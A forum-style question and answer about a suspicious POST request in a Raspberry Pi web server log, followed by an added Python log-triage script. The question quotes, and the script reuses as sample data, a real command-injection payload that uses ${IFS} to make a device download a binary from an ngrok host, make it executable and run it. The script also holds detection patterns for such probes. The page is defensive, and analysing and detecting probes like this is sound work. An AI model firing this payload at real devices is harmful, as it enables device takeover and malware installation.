
Can you confirm that this strange POST request is a kind of cyber attack?


I've opened a web site which has only the purpose of sharing textual information. No database plugged in on the backend and no idea of authentication on it. However, when I looked at the log I noticed this request:

POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a

It has occurred two times and my server responded both times with a 404 response. But now I'm a little bit concerned about it. My website is running on a Raspberry which is plugged into my ISP device. Even if my server doesn't have any sudo rights, I'm wondering if there is any risk?

Also, can someone explain to me what these suspicious entries mean? What could be the risk? And finally, can you share with me some tips / good behavior to have when setting up a pipe between any device (Raspberry) and the internet?


Solution

  • No need to be concerned. It is an attack, but not directed at your specific site, but rather scanning a large portion of the internet for a specific vulnerability. The fact that your server responded with a 404 means it did not contain the vulnerable page.

    This will happen on any site exposed to the public internet and is considered a part of the background noise.
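
An added example, not part of the original answer: a small access-log triage script that applies the answer's reasoning, flagging requests whose decoded URL carries shell-injection markers and using the response status to separate missed probes (4xx) from ones that deserve a closer look. It assumes Combined Log Format; the marker names, client addresses, timestamps and the 200-status variant are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Combined Log Format prefix: client, timestamp, "METHOD target PROTO", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Things that never belong in a legitimate URL for a static text site
MARKERS = {
    "ifs_variable": re.compile(r"\$\{?IFS\}?"),
    "shell_binary": re.compile(r"/bin/(?:ba)?sh\b"),
    "downloader": re.compile(r"\b(?:wget|curl|tftp)\b"),
    "chmod": re.compile(r"\bchmod\b"),
    "newline": re.compile(r"[\r\n]"),
}

def triage(line):
    """Return a finding dict for a command-injection probe, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, method, target, status = m[1], m[2], m[3], int(m[4])
    decoded = unquote(target)  # %0A -> newline, %27 -> quote
    hits = sorted(n for n, rx in MARKERS.items() if rx.search(decoded))
    if not hits:
        return None
    # 4xx means the probed path was not served; anything else needs a look
    verdict = "noise" if 400 <= status < 500 else "investigate"
    return {"client": client, "method": method, "path": target.split("?")[0],
            "status": status, "markers": hits, "verdict": verdict}

# Constructed sample log: the request is the one quoted in the question; the
# client addresses, timestamps and the 200 variant are made up for the demo.
PROBE = ("/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c"
         "${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget"
         "${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;"
         "${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a")
SAMPLE_LOG = [
    f'203.0.113.7 - - [01/Jan/2021:10:00:00 +0000] "POST {PROBE} HTTP/1.1" 404 196',
    '198.51.100.4 - - [01/Jan/2021:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 5120',
    f'203.0.113.9 - - [01/Jan/2021:10:01:00 +0000] "POST {PROBE} HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        finding = triage(entry)
        if finding:
            print(finding["verdict"], finding["client"], finding["status"],
                  finding["path"], ",".join(finding["markers"]))
```

A 3xx or 5xx on such a request is reported as "investigate" on purpose: a redirect or server error does not prove the path is absent the way a 404 does.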